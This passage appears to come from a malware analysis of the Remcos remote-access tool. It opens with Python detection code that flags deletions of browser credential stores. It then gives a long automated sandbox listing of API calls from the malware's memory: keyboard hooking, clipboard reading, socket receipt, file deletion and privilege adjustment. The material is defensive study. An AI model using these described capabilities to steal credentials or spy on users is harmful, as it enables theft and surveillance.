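BROWSER_IMAGES = {"chrome.exe"}
SYSMON_FILE_DELETE = {23, 26}      # FileDelete (archived), FileDeleteDetected


def relative_to_profile(path):
    """Lower-case, normalize separators and cut everything before 'appdata\\'
    so C:\\Users\\<anyone>\\AppData\\... compares equal across users."""
    p = ntpath.normpath(path.replace("/", "\\")).lower()
    idx = p.find("\\appdata\\")
    return p[idx + 1:] if idx != -1 else p


def is_credential_store(path):
    rel = relative_to_profile(path)
    return any(fnmatch.fnmatchcase(rel, pat) for pat in CREDENTIAL_STORE_PATTERNS)


def flag_credential_store_deletes(events):
    """Return the file-delete events whose target is a credential store and
    whose deleting image is not the browser that owns it."""
    hits = []
    for ev in events:
        if ev.get("EventID") not in SYSMON_FILE_DELETE:
            continue
        if ntpath.basename(ev.get("Image", "")).lower() in BROWSER_IMAGES:
            continue
        if is_credential_store(ev.get("TargetFilename", "")):
            hits.append(ev)
    return hits


# Constructed Sysmon-style records (not from the report); only the first and
# the last should be flagged.
SAMPLE_EVENTS = [
    {"EventID": 23, "Image": r"C:\Users\bob\Downloads\e-Payment.NET.CMS4006975815.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"EventID": 23, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"EventID": 23, "Image": r"C:\Users\bob\AppData\Local\Temp\updater.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Cache\f_0001"},
    {"EventID": 11, "Image": r"C:\Users\bob\AppData\Local\Temp\updater.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"EventID": 26, "Image": r"C:\Users\alice\AppData\Local\Temp\updater.exe",
     "TargetFilename": r"C:/Users/alice/AppData/Local/Google/Chrome/User Data/Profile 1/Login Data"},
]
```

Sysmon only emits events 23/26 when FileDelete logging is enabled in its configuration, and the deleting image here will be whatever process Remcos was injected into (process 13 in this analysis), so the allowlist should stay short and the rule should alert on the image rather than try to enumerate bad ones.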
                              APIs
                              • Sleep.KERNEL32(000003E8), ref: 00402854
                              • GetLocalTime.KERNEL32(?), ref: 00402876
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Timeout expired, resetting connection.,?,?,?,?), ref: 004028A1
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004028AC
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004028B6
                              • printf.MSVCRT ref: 004028BD
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004028C9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004028D2
                              Strings
                              • %02i:%02i:%02i:%03i [KeepAlive] , xrefs: 0040289C
                              • Timeout expired, resetting connection., xrefs: 00402896
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalSleepTimeV10@V?$basic_string@printf
                              • String ID: %02i:%02i:%02i:%03i [KeepAlive] $Timeout expired, resetting connection.
                              • API String ID: 2756237499-72633004
                              • Opcode ID: 8a003b9b96387b9a977b2827803bf9a6b624b48ad5c8bb1a43ea3030722d3ccf
                              • Instruction ID: 772636e3ebd337da963efdda9584c1e6191fd0daf56e0bc3e27ada7e64864670
                              • Opcode Fuzzy Hash: 8a003b9b96387b9a977b2827803bf9a6b624b48ad5c8bb1a43ea3030722d3ccf
                              • Instruction Fuzzy Hash: 03118B76941244AFC750EBE5DA898EFB7F8BE04300750457BF543E2590DAB8EE84C729
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00415A30,00415940,00415268,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E), ref: 0040222E
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040223B
                              • malloc.MSVCRT ref: 00402248
                              • recv.WS2_32(00415A30,00000000,00000000,00000000), ref: 00402259
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040226D
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402277
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402280
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040228D
                                • Part of subcall function 004022EA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,00415A30,00000000), ref: 004022FC
                                • Part of subcall function 004022EA: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668), ref: 00402314
                                • Part of subcall function 004022EA: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402323
                                • Part of subcall function 004022EA: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040232D
                                • Part of subcall function 004022EA: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 00402346
                                • Part of subcall function 004022EA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040234F
                                • Part of subcall function 004022EA: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415A60), ref: 0040236E
                                • Part of subcall function 004022EA: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040238E
                                • Part of subcall function 004022EA: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668), ref: 004023A6
                                • Part of subcall function 004022EA: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004023B8
                                • Part of subcall function 004022EA: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6A3F5E04), ref: 004023CE
                                • Part of subcall function 004022EA: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023D8
                                • Part of subcall function 004022EA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023E1
                                • Part of subcall function 004022EA: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,?), ref: 004023F2
                                • Part of subcall function 004022EA: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023FC
                                • Part of subcall function 004022EA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402405
                                • Part of subcall function 004022EA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402419
                              • free.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022AE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D0
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D9
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??1?$basic_string@V01@$??0?$basic_string@??4?$basic_string@$D@1@@$??9std@@?substr@?$basic_string@D@2@@0@V12@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?length@?$basic_string@?size@?$basic_string@Y?$basic_string@freemallocrecv
                              • String ID:
                              • API String ID: 2200674315-0
                              • Opcode ID: a6d19df7b26a596a4de367439ba62f5d2f94adbaaf081c4d5c5af70b61a6c544
                              • Instruction ID: efd5f749c13a253eb37fde81f2b1e2490532d806b03320675b530293b808823e
                              • Opcode Fuzzy Hash: a6d19df7b26a596a4de367439ba62f5d2f94adbaaf081c4d5c5af70b61a6c544
                              • Instruction Fuzzy Hash: B8211D3250050AAFCB11DBA0DE4DAEEB779FF54309F10407AF406A2190DBB59E49CB28
                              APIs
                              • FindFirstFileA.KERNEL32(?,?,00415918,00410668,76F93520), ref: 0040F2F5
                              • FindNextFileA.KERNEL32(0040E4BC,?), ref: 0040F33C
                              • SetFileAttributesA.KERNEL32(?,00000080), ref: 0040F3F6
                              • DeleteFileA.KERNEL32(?), ref: 0040F403
                                • Part of subcall function 0040F234: RemoveDirectoryA.KERNEL32(?), ref: 0040F3B1
                              • GetLastError.KERNEL32 ref: 0040F40F
                              • FindClose.KERNEL32(0040E4BC), ref: 0040F42B
                              • RemoveDirectoryA.KERNEL32(0040E4BC), ref: 0040F434
                              • FindClose.KERNEL32(0040E4BC), ref: 0040F442
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                              • String ID:
                              • API String ID: 2341273852-0
                              • Opcode ID: bda2e7eeef083443b7bd4fac117ae406248ac067903fb5d96853e11b5ddda6fa
                              • Instruction ID: c9d715fef9de8b24144a52c82442ab3d42063f8e50258a23890eccb11d7ae604
                              • Opcode Fuzzy Hash: bda2e7eeef083443b7bd4fac117ae406248ac067903fb5d96853e11b5ddda6fa
                              • Instruction Fuzzy Hash: 5151B636A0050C4BCF28CA749C446EEB7A6BBD4310F5485B9E806E76D0DEB99E8D8A44
                              APIs
                              • GetCurrentProcess.KERNEL32(00000028,?,00415268), ref: 0040CA4E
                              • OpenProcessToken.ADVAPI32(00000000), ref: 0040CA55
                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040CA67
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040CA86
                              • GetLastError.KERNEL32 ref: 0040CA8C
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                              • String ID: SeShutdownPrivilege
                              • API String ID: 3534403312-3733053543
                              • Opcode ID: 48c1e8d5093e11796e88808fd98121dfa36cb171cdc9d53d0fc18bf8e136cc78
                              • Instruction ID: b55852355777b42c5cafdc737e44021a98442e900811cd24b975246bc46e5c25
                              • Opcode Fuzzy Hash: 48c1e8d5093e11796e88808fd98121dfa36cb171cdc9d53d0fc18bf8e136cc78
                              • Instruction Fuzzy Hash: 6DF05871801129BBDB00ABA1ED0DEEF7EBCEF09358F104020B506E2090C6B45A88CBB5
                              APIs
                              • GetUserNameW.ADVAPI32(?,?), ref: 0040E57B
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00411848,?,?), ref: 0040E594
                              • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040E5A3
                              • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(00000010,00000000), ref: 0040E5AF
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E5BA
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E5C3
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@G@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@1@@NameUserV10@V10@@
                              • String ID:
                              • API String ID: 3382107156-0
                              • Opcode ID: 98fc6973e258bf046ee6ab017d8c874cfade209d0468d1f87d8a2fe65baca8c3
                              • Instruction ID: f1d4da816d663859cec578e5c7d94290c2f1c89324f161e9baf60459a55de7f2
                              • Opcode Fuzzy Hash: 98fc6973e258bf046ee6ab017d8c874cfade209d0468d1f87d8a2fe65baca8c3
                              • Instruction Fuzzy Hash: 90018CB5C0110DABDB11DB94EC49EDE7B7CEB08304F108176F915E2191EB74A68DCBA4
                              APIs
                              • FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 0040815E
                              • LoadResource.KERNEL32(00000000,00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 00408169
                              • LockResource.KERNEL32(00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 00408170
                              • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 0040817B
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Resource$FindLoadLockSizeof
                              • String ID: SETTINGS
                              • API String ID: 3473537107-594951305
                              • Opcode ID: 4a4f9f9fedebf4e8c05053aceb2eda3fc10e4a3aaeaffec35722cfdb0d535c0a
                              • Instruction ID: 01db6dd320cb8d17c195901b687e59d16bc98a51b3a2c1f815eadbb7ce5068f8
                              • Opcode Fuzzy Hash: 4a4f9f9fedebf4e8c05053aceb2eda3fc10e4a3aaeaffec35722cfdb0d535c0a
                              • Instruction Fuzzy Hash: C9E0BF35680314BBD6201BA5BC0DF977E68EB8AB62F004025F70DC6190DAB1444087A5
                              APIs
                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040388F
                              • SetWindowsHookExA.USER32(0000000D,0040385C,00000000), ref: 0040389D
                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004038B2
                              • TranslateMessage.USER32(?), ref: 004038BC
                              • DispatchMessageA.USER32(?), ref: 004038C6
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Message$DispatchHandleHookModuleTranslateWindows
                              • String ID:
                              • API String ID: 521483645-0
                              • Opcode ID: 9f2d6cb336974f6d21199ad434600dc08e561f79de4f796117326006807f6229
                              • Instruction ID: 353822e126b8fa7368d95cd0bef129b561c7f90acebca083c61d1e8d62fd4680
                              • Opcode Fuzzy Hash: 9f2d6cb336974f6d21199ad434600dc08e561f79de4f796117326006807f6229
                              • Instruction Fuzzy Hash: 7CF04473900149BBD720AFA59C48DEB7FFCEBC5B11B00847ABA41E2154D6789545CB74
                              APIs
                              • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 0040E4D3
                              • GetProcAddress.KERNEL32(00000000), ref: 0040E4DA
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: GetLastInputInfo$User32.dll
                              • API String ID: 2574300362-1519888992
                              • Opcode ID: 2e41d0d454fa43021efc0d210194af18c12e8c2f34d28340e7a9680a4206e5ea
                              • Instruction ID: c49a19daebca9e066ce9d428bbfec3a7347074465f3c8db43cf9aeb53f5350e0
                              • Opcode Fuzzy Hash: 2e41d0d454fa43021efc0d210194af18c12e8c2f34d28340e7a9680a4206e5ea
                              • Instruction Fuzzy Hash: 6CC092B49A0600BFC7012FB2ED0DAD83AA4A684702724C436B20AE21B4CBBD50C1DA6D
                              APIs
                              • OpenClipboard.USER32(00000000), ref: 00405103
                              • GetClipboardData.USER32(00000001), ref: 0040510F
                              • CloseClipboard.USER32 ref: 00405117
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?,?,00405184,?,?,00000000,76F90F00,?,?,?,?,?,00404196), ref: 00405134
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Clipboard$V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@DataOpenU?$char_traits@
                              • String ID:
                              • API String ID: 1727351239-0
                              • Opcode ID: 53859871c346f8d909a8a4067bc2c69c3a6e0e0f248ca5fb0bf1a49c13e3f3f4
                              • Instruction ID: 906847f47c7b4b11390f21f1ccf552f120e036e9c6eec0ef59ca3d1b5a3ea75f
                              • Opcode Fuzzy Hash: 53859871c346f8d909a8a4067bc2c69c3a6e0e0f248ca5fb0bf1a49c13e3f3f4
                              • Instruction Fuzzy Hash: E6E06D75A41218BFD7409B50DC49FEFBBACEB48B41F008132BD05EA280D7B49981CAA8
                              APIs
                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,0040A1F9,?,00415268,00415968,00415268,00415B08,00415268,00000000,00415268,1.7 Pro), ref: 0040819B
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,?,0040A1F9,?,00415268,00415968,00415268,00415B08,00415268,00000000,00415268,1.7 Pro,00415268,?), ref: 004081AC
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@InfoLocaleU?$char_traits@
                              • String ID: hRA
                              • API String ID: 4090406865-819137882
                              • Opcode ID: e3e50d6bbcdab5c93a1ca4425c6ccadb35c0c4967b2e4fa0870170a0cdf04c02
                              • Instruction ID: 1a47b6e8894e7d79e7ab4b57d9db25869eba35aadfc9e332033dbe3f11390d94
                              • Opcode Fuzzy Hash: e3e50d6bbcdab5c93a1ca4425c6ccadb35c0c4967b2e4fa0870170a0cdf04c02
                              • Instruction Fuzzy Hash: 2EE0127560020DFBDB40CB90DC45FCE77BCEB08749F004051BA06D7190D6B0EB488B50
                              APIs
                              • GetKeyState.USER32(00000014), ref: 0040392F
                              • GetKeyState.USER32(00000014), ref: 00403938
                                • Part of subcall function 00404FDE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410A64,?), ref: 0040505E
                              • CallNextHookEx.USER32(?,00000000,?,?), ref: 0040397B
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: StateV?$allocator@$??0?$basic_string@CallD@1@@D@2@@std@@D@std@@HookNextU?$char_traits@
                              • String ID:
                              • API String ID: 98962008-0
                              • Opcode ID: 2719df795b598792e02b9cd92bb9d782a1042e2cb6b283e7d445e30c5fd2cdbc
                              • Instruction ID: 016176dd5e4550907043258ced9a7594ac35f6d0ba92dea6ea93643b686b713f
                              • Opcode Fuzzy Hash: 2719df795b598792e02b9cd92bb9d782a1042e2cb6b283e7d445e30c5fd2cdbc
                              • Instruction Fuzzy Hash: 6611DDB220020987DF00AF35CC80BAF3A199B48355F00403EAA423A2D3CABD8D149B9E
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: hXMV$hXMV
                              • API String ID: 0-400149659
                              • Opcode ID: 32d6da195fab9a79b0a2790fc5938e76e7787eb2c00dcb82f7320fa8a259af23
                              • Instruction ID: eaa8797a659175eabba1fc64c3000a1aeaf6329f201fbe84486763329dbd0212
                              • Opcode Fuzzy Hash: 32d6da195fab9a79b0a2790fc5938e76e7787eb2c00dcb82f7320fa8a259af23
                              • Instruction Fuzzy Hash: 67F0F672E08789ABD7048759DD92BAFFBB8E745B20F30463AF021636C1D27919018AA0
                              APIs
                              • GetKeyboardLayout.USER32(00000000), ref: 0040374F
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayout
                              • String ID:
                              • API String ID: 194098044-0
                              • Opcode ID: 7a138c4a33ac2ea2e17b4cf10e9ffc2fbbddba362a0710cd35810d1b16c1cc02
                              • Instruction ID: 2df3cf34392ab381e4f069577e8eaff7fdb13a446b1c8ff3861ab48797279b8b
                              • Opcode Fuzzy Hash: 7a138c4a33ac2ea2e17b4cf10e9ffc2fbbddba362a0710cd35810d1b16c1cc02
                              • Instruction Fuzzy Hash: 59D0A7B794A3200EF6A4BB6CBA427E13784EB50B21F85903FE5801BAC8D4E469C20658
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bba3e4718dbdc75b72417a0249ace700e515a5928d43ceadd18bfbdad54d5587
                              • Instruction ID: 1364cb1d12eabb9626d35066541146f39bd6914f24beff9e251c0f817e1c4944
                              • Opcode Fuzzy Hash: bba3e4718dbdc75b72417a0249ace700e515a5928d43ceadd18bfbdad54d5587
                              • Instruction Fuzzy Hash: D0D05E70611144EBCB04CB58C94574E76F8A705744F604865D001EB290C278EE40E704

                              Control-flow Graph

                              APIs
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00415968,00000000,00415940), ref: 0040652E
                              • CreateDirectoryA.KERNEL32(00000000), ref: 00406535
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00415918,004108CC,?), ref: 0040654C
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?), ref: 00406559
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?), ref: 00406569
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00406572
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00415968,00000000,00415940), ref: 00406597
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 004065A0
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?), ref: 004065A8
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004065E5
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040661D
                              • CopyFileA.KERNEL32(0041580C,00000000), ref: 00406625
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(00000001,00000000,?,?,?,?,004108CC,?), ref: 00406668
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,004108CC,?), ref: 00406675
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,004108CC,?), ref: 00406680
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004108CC,?), ref: 00406689
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004108CC,?), ref: 00406692
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004066AE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004108CC,?), ref: 004066B7
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004066C1
                              • CopyFileA.KERNEL32(0041580C,00000000), ref: 004066C9
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(0041580C), ref: 004066D6
                                • Part of subcall function 0040712F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040713F
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004066E8
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000007), ref: 0040671F
